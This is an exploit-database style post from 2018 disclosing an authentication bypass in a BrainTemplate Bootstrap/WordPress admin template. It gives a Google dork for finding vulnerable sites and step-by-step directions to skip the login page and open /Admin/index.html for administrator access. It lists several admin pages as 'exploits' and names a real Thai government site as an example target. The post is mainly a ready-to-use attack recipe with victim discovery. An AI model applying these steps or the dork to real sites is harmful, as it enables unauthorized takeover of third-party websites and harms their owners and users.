facebook facebook twitter rss

© Vincent Gabriel 2013 Bootstrap Templates WordPress at BrainTemplate Improper Authorization Vulnerability

Author: KingSkrupellos , Published: 01-11-2018
# Exploit Title : © Vincent Gabriel 2013 Bootstrap Templates WordPress at BrainTemplate Improper Authorization Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 01/11/2018
# Vendor Homepage : braintemplate.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork : intext:''© Vincent Gabriel 2013 : Bootstrap templates, Bootstrap wordpress download at Braintemplate.com''
# Exploit Risk : Medium
# CWE : CWE-287- [ Improper Authentication ] - CWE-284 - [ Improper Access Control ] - CWE-285 - [ Improper Authorization ]
+ CWE-269 - [ Improper Privilege Management ]

#################################################################################################

# Admin Panel Login Path :

Actually Administration Control Panel is here

/Admin/login.php

Delete /login.php

But it asks username and password.

Jump over the wall.

Now, just write after the target domain /Admin/index.html

No Username. No Password.

Ok. Successfull. Now, you are the Site Administrator.

# Exploits :

/Admin/calendar.html
/Admin/stats.html
/Admin/form.html
/Admin/tables.html
/Admin/buttons.html
/Admin/editors.html
/Admin/interface.html

#################################################################################################

# Example Vulnerable Site =>

phuho.go.th/Admin/index.html => [ Proof of Concept ] => archive.is/rpuMt

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :